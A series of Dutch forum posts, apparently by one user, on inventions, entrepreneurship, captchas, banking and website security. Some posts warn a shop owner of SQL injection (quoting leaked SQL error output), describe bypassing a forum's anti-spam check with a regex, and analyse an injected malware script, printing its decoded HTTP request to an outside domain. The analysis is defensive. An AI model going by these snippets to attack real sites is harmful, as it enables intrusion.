spruce

Dit deed ik serieus 5 jaar geleden ook al. Ik kan je verzekeren, dat de band gaat verschuiven en dat er bobbels en putten ontstaan Bij mij werkte het iig niet lang

Het valt me op dat investeerders pas instappen als iemand een goed doordacht ondernemingsplan heeft liggen. Kijk maar naar bijv een programma zoals Dragons Den. Daar kan het nog zo'n geweldig idee zijn, als er geen waterdicht plan is, gaat het feest niet door. Vanuit de investeerder gezien is dat ook wel logisch, maar aan de andere kant worden interessante ideeën in no time in de gootsteen gegooid. Tot die laatste groep reken ik mijzelf ook. Dagelijks doe ik ideeën op die ik dan maar netjes allemaal in een schriftje uitwerk. Meestal laat ik deze een paar maanden bezinken en ga ik voorzichtig in mijn omgeving informeren naar de reactie van kennissen. Een klein deel van deze ideeën blijven je na die periode nog steeds fascineren en dan weet ik voor mezelf dat ik die ideeën verder moet gaan uitwerken. Doordat ik student ben, heb ik helaas geen financiële middelen om gelijk te beginnen. Natuurlijk moet je wel een ondernemingsplan hebben, maar als "uitvinder" zijnde zie/maak je dit plan vaak mooier dan het in de praktijk zal gaan uitvallen. Waar zijn de investeerders gebleven waar je onder geheimhouding je idee aan presenteert (nog zonder een uitgebreid ondernemingsplan). Deze investeerders hebben vaak een veel beter beeld van hoe de markt in elkaar steekt. Als een investeerders wel geloofd in je idee, dat hij dan je wat zakgeld geeft om je bedrijf op te starten en dat je met dit geld ook nog voor zorgt dat er thuis brood op de plank komt. De investeerder kan je dan ook gelijk voorzien van een groot netwerk aan mensen die je kunnen helpen bij het opbouwen van de onderneming. Dat is toch een geniale constructie? Weliswaar voor de investeerder een groter risico, maar die kan in de eerste paar maanden al besluiten om de investering terug te trekken. Bovendien kan hij zijn eigen contacten aandragen waar hijzelf het volste vertrouwen in heeft. Deze constructie zou voor mij DE oplossing zijn. Ik ben dus opzoek naar investeerders die bereidt zijn om al vroegtijdig in te stappen en mij willen helpen bij het eventueel opbouwen van een onderneming rondom het idee. De combinatie investeerder+startercoach is vrij zeldzaam, maar met de combinatie investeerder+netwerk moet het zeker ook lukken. Of heb ik nu een totaal verkeert beeld over hoe dit soort zaken in zijn werk gaat?

Ik neem aan dat de TED talks voor de meeste mensen hier op het forum ook verplichte kost is. Vanavond zat ik er weer een paar te kijken en deze talk wilde ik jullie niet onthouden. Deze man bedenkt in no time nieuwe ideeën, waar grote multinationals al jaren over bezig zijn

Ziet er erg goed uit. Als hij af is, zou ik er ook graag mee willen spelen. BTW dat blurren had ik grondiger gedaan. Niet dat iemand wat met die gegevens kan, maar met reverse blur tooltje kan ik zo voor je opnoemen wat er staat. Wellicht handig om te weten dat dit dus mogelijk is, voor het geval er een situatie voordoet waar wel belangrijke gegevens onleesbaar gemaakt moeten worden

Denk je ook aan de veiligheid van je shop? Ik kan zo SQL injectie doen en prijzen aanpassen als ik dat zou willen Bovendien krijg ik diverse sql dumps op mijn scherm, DB function failed with error number 2006 MySQL server has gone away SQL=SELECT name, link,id FROM jos_menu WHERE published='1' AND link LIKE 'index.php?option=com_virtuemart%'

Ik zou maar vast bukken, want straks gaat er iemand iets roepen over java!=javascript :) Ja dat word hier in het topic ook steeds door elkaar gehaald :P

Dit blijft een eindeloze discussie natuurlijk. Iedereen heeft zo zijn voorkeuren, maar in elke taal maken mensen de vreselijkste fouten. Ik durf bijna te wedden dat er meer exploits geschreven zijn voor javascript, dan voor php. We moeten niet vergeten dat javascript door exploits ook vaak misbruikt word. Al is het maar om enkel iets interessants te printen. In zulke gevallen is javascript een hele handige toevoeging op een andere brakke scripttaal om te misbruiken. Het punt is gewoon dat veel mensen zich programmeur noemen, maar beter eerst hun schoolgeld maar eens terug moeten gaan halen. Zo kan je een hele sterke AES 256 bit encryptie ook super verkeerd implementeren en dat gebeurd maar al te vaak. En jij als opdrachtgever ziet versleutelde data, dus de programmeur zal het wel goed gedaan hebben, niet dus.

Als ik wil reageren op een topic en ik ben niet ingelogd, dan krijg ik melding dat ik moet inloggen. Maar na het inloggen springt hij naar het forum overzicht ipv naar het topic dat ik aan het lezen was. Heel irritant

Ik wil jullie deze prachtige vinding toch niet onthouden. Bij het Amerikaanse leger gebruiken ze al een lange tijd de iRobot voor verkenning in gevaarlijke gebieden. Er zijn verschillende varianten van gemaakt, met stuk voor stuk handige snufjes. Maar deze vindt ik wel briljant. Hoe tover je nu een 2,5 meter lange mast uit een kleine robot? Nou zo dus: http://blog.makezine.com/archive/2008/12/situational_awareness_mast_zipperma.html?CMP=OTC-0D6B48984890 Over "out of the box thinking" gesproken ;D Deze mag ook wel aan dat lijstje toegevoegd worden De uitvinder verdient van mij een reusje

Ik heb al eens onderzoek gedaan naar captcha's en mijn ervaring was dat ze behoorlijk moeilijk te kraken zijn als je voor alle letters dezelfde kleur neemt en er voor zorgt dat letters elkaar overlappen. Het algoritme dat je dan moet schrijven om de captcha te kraken, is echt beesten werk. Maargoed we gaan allemaal in de toekomst steeds meer en meer last hebben van grote hoeveelheden chinezen die ze gewoon handmatig oplossen. Dan kun je wel vrolijk allemaal leuke puzzeltjes verzinnen, maar ze komen tenslotte allemaal gewoon in een queue terecht waar iemand ze handmatig wel even voor je oplost. Dergelijke praktijken zien we nu al en gaan we in de toekomst nog veel en veel meer tegenkomen. >:( Zelf gebruik/onderzoek ik al een tijdje de Yubikey -> www.yubico.com. Dit is een usb stickje dat zich voordoet als een usb keyboard. Even op een knopje drukken en hij genereerd een OTP (One Time Password). Geef elke persoon die een internetabonnement afsluit zo'n sleutel en je bent van een boel gezever af. Maarja dit is net zo'n project als wereldwijde vrede bereiken :p Ik zal voor de gein even een paar keer op mijn yubikey drukken. Kun je zien hoe het eruit ziet djhibcfeeuninvedlgkceljelrditdujvgkkvcdfehkb djhibcfeeuniedjkkfjrfuiinddurhjgrhkcnuriiikl djhibcfeeunilklkuurdeueivrcntgbljvictigffnbg De eerste 11 tekens zijn altijd hetzelfde en die zijn per yubikey verschillend. Aan de hand daarvan kun je controleren om welke gebruiker het gaat. De overige tekens is AES encrypted data met daarin ophogende tellers. Daar zit 1 teller in die bijhoud hoeveel keer je de yubikey hebt gebruikt sinds je hem in bezit hebt. De andere teller houd bij hoeveel je hem gebruikt heb sinds dat hij in je USB poort zit.

Ok ik geef toe, het topic loopt niet als een geoliede machine ;)

Een erg mooie vinding. Dezelfde techniek word al jaren toegepast op bijv de duurdere papierschredders. Kom ik gelijk bij de vraag, welk specifiek onderdeel valt hier te patenteren? Volgens mij kun je op die manier ook een slijptol of kettingzaag maken zonder daarbij deze meneer zijn patent te schenden. Alhoewel een slijptol qua geleiding niet zo voor de hand ligt :P Als ik de filmpjes op www.sawstop.com bekijk, dacht ik gelijk dat deze machines onder licentie waren gemaakt. Maar niets is minder waar: The original idea was to license the technology to other table saw manufactures, but after negotiations failed to produce agreements, the trio decided that if the SawStop technology was ever to reach the market-place, the three founders would have to do it themselves. Je kunt het werkelijk bijna niet geloven dat ze op zo'n korte tijd zo'n complex apparaat hebben gebouwd. Of ze moeten gebruik gemaakt hebben van veel bestaande onderdelen.

Zit er een soort veermachanisme op het draaipunt van de Excenters? Het lijkt me dat anders de onderste Excenters steeds naar beneden vallen. Dat is irritant tijdens de montage

Mijn ervaring is dat het op zakelijk gebied bij alle banken wel wat is. Zo had ik al een tijdje een zakelijke en privé rekening bij de Postbank. Eerst krijg je een brief dat het wellicht handig is om je zakelijk en prive samen te voegen tot 1 mijn.postbank inlog. Zo gezegd zo gedaan. Heb je net het hele zaakje rond, is een maand later na het inloggen ineens mijn privé rekening verdwenen :-\ Na wat heen en weer gebeld te hebben, bleek dat ze beide rekeningen weer losgekoppeld hadden. Mijn zakelijke inlog bleef bestaan en voor mijn privé inlog moest ik weer een vrije middag nemen om het op te halen bij het postkantoor. Tan codes hadden ze ook maar even geblokkeerd voor me :P Behoorlijke puinhoop dus. De rabobank lijkt me op dat gebied wat stabieler, maar is absoluut niet handig voor mensen die op meerdere plaatsen wonen/werken. Moet je iets regelen met de bank, dan moet dat perse in de rabobank zijn waar je ingeschreven staat. Ook moet je altijd die random reader bij je hebben. En ze schijnen voor elke inlog die je op de site doet een bedrag te rekenen.

offtopic: Deze meneer laat inderdaad meerdere proefballonnetjes op, maar ik ben van mening dat iedereen met respect zijn ideeën moet bekijken. Zelf heb ik ook vaak genoeg ideeëndi die in eerste instantie ok lijken. Natuurlijk doe je er meer onderzoek naar, maar om nu al een heel ondernemingsplan te gaan schrijven gaat me te ver. Juist op een forum als dit bevinden zich mensen met echte kennis van een specifiek vakgebied. Wat is er mooier dan een proefballonnetje oplaten en het door andere mensen lek te laten prikken met gegronde redenen? Scheelt je een hoop tijd en je helpt de uitvinder gelijk van zijn waanbeeld af dat hij een goed idee heeft. Ik zou voor willen stellen om een extra categorie "Proefballonnen pretpark" op het forum te maken.

Zijn de afleveringen terug te zien? Ik ben wel erg benieuwd of het dit keer wat beter is. ;D Alhoewel het wel dezelfde jury leden zijn :'(

Waarom zou een captcha dan gevoeliger zijn voor een spambot scan?

Dat is de reden dat we ze op HL niet meer gebruiken, en iets specifieks voor het forum hebben ontwikkeld (druk maar eens op 'meld dit bericht aan de moderator' om een voorbeeld te zien). Werkt zeer goed tegen allerlei soorten spambotjes. Nou dat viel me laatst op, en ik ben van mening dat dit totaal niet veilig is. Met reg expression vindt ik zo het woord dat tussen quotes staat (bijv marketing) en ik kan uit de broncode het gevraagde aantal letters opvragen. Eitje, heb het in 5 min geprogrammeerd. Beter zou je nog steeds een captcha toepassen en dan er naast zetten (typ de laatste 3 letter van de captcha over)

Het gaat hier om 3 verschillende hosters waar het probleem zich voordoet. De enige logica is dat het allemaal dezelfde programmeurs zijn. Daar gaat het vaak nogal mis. Vroeger ging ik er ook van uit dat dergelijke praktijken allemaal middels automatische scripts gebeurde. Inmiddels is mijn ervaring dat ze scans uitvoeren en de zwakke websites eruit halen. Vaak word er aan logs te zien nog wel handmatig ingebroken tegenwoordig. Hebben ze één website van je, dan pakken ze gewoon de volgende uit je portfolio. Mocht je een eigen website hebben, controleer voor de gein eens de IP adressen die op je website langskomen. Je zal schrikken van wat voor praktijken er tegenwoordig uitgehaald worden. [off topic] Wist je dat er organisaties zijn die niets anders doen dan capcha's overtikken. 1000 overgetikte captcha's kosten je maar omgerekend ongeveer 1 euro. Ik ben bang dat we hier in de toekomst ook veel last van gaan krijgen

Ik heb deze uitzending ook gezien, maar het niveau was echt erg slecht. - meneer met een condoom met daaraan een slangetje dat door je broekspijp richting je schoen loopt. Heb je een kleine blaas, dan hoef je 's ochtends enkel maar standaard dit ding aantrekken en dan kun je overal en altijd je blaas legen (in je schoen ;P) - meneer met een elastische sleepkabel met aan 1 uiteinde een stalen kogel om in een aanhangwagen dissel te steken. Op die manier kun je je aanhangwagen uit een ravijn slepen ofzo. Laat nu net bij de demonstratie die kogel losschieten. Levensgevaarlijk ! Maar wel een goede training voor de lachspieren Wat heb ik stuk voor stuk moeten lachen om deze ideeën. En die jury telkens maar serieus op in gaan :P Amai :)

Even voor mij als geheugenopfrisser: wat voor voordeel levert deze urencriterium op?

Strakke website. Een leuke basis om de website mee te vullen. Ik zou in de toekomst wel meer informatie erop zetten en daarmee beetje bij beetje de banner en footer verkleinen. Ook gelijk even gekeken of je website geen vervelende lekken heeft. Je gebruikt eigenlijk alleen HTML, dus ik zie daar geen zwakheden in. Mocht je veel spam ontvangen, dan ligt dat aan je mailto: linkjes van al je mailadressen bij contact. Veel spambots scannen het internet en vinden pagina's genaamd contact.html of gastenboek.html vaak al heel snel. Ben je eenmaal gevonden door zo'n bot, dan kom je daar ook niet echt makkelijk meer vanaf. Het meest effectieve is gewoon je mailadressen als plaatje laten zien, zonder een link erachter. Scheelt je bakken aan spam, en dat mailadres tikken klanten toch wel over als het moet

Wel mijn vakgebied, alleen ben ik bang dat het voor mij geen toegevoegde waarde oplevert qua presentaties dan. Om te netwerken daar is natuurlijk goud waard als het druk bezocht word tenminste. Is er een gedetailleerd programma bekend?

Als ik dat stukje code decrypt en analyseer, dan voert hij de volgende actie uit: http://8speed.info/t/?255774fe316 GET /t/?255774fe316 HTTP/1.1 Host: 8speed.info User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: nl,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cache-Control: max-age=0 HTTP/1.x 404 Not Found Date: Sun, 28 Dec 2008 21:00:18 GMT Server: Apache/2 X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Connection: close Transfer-Encoding: chunked Content-Type: text/html ---------------------------------------------------------- Het zit best creatief in elkaar moet ik zeggen. Uiteraard bestaat die pagina niet meer, want ze zijn ook niet gek. Maar je hebt duidelijk te maken met complexe malware, verbaas me elke keer weer hoe ze het verzonnen krijgen. 8speed.info is a domain controlled by two nameservers at firmtop.net. They are on the same IP network. 8speed.info has one IP record. 2speed.info, 1speed.info, 1sense.info, ns2.1sense.info, ns2.2speed.info and at least 16 other hosts point to the same IP. 2speed.info, 1speed.info, 1sense.info, add-block-plus.net, add-block-filter.net and at least one other host use this as a nameserver. 2speed.info, 1speed.info, 1sense.info, add-block-plus.net, add-block-filter.net and at least one other host use this as a mailserver. google-analistic.com share nameservers with this domain. ns1.8speed.info, ns2.8speed.info and mail.8speed.info are subdomains to this hostname. [/code Tussen bovenstaande domeinen zitten voor mij een paar bekenden die ik al eens eerder ben tegen gekomen. Voorlopig lijkt het uit china te komen.

Ik heb jaren lang php geprogrammeerd. Ik vermoedt dat je hier structureel onveilige php code hebt geïmplementeerd. Het opnieuw instellen van je PHP configuratie is een leuke tijdelijke oplossing, maar vaak beperkt het je tegelijk ook jezelf in bepaalde php functies. Ik heb een vermoeden dat al je website gevoelig zijn voor cross-side scripting. Dit is een veel gemaakte programmeerfout die zeer vervelende gevolgen kan hebben. Op die manier kan zonder dta je het weet jou webserver misbruikt worden voor criminele toepassingen en het vervelende is dat jij daar bij de politie voor op het matje moet komen. Het is tenslotte jou server. Ik ben bang dat ik broncode van je moet hebben om het op te kunnen lossen. Als je me een url of IP adres geeft van de betreffende website(s), dan kan ik kijken of er XSS is toe te passen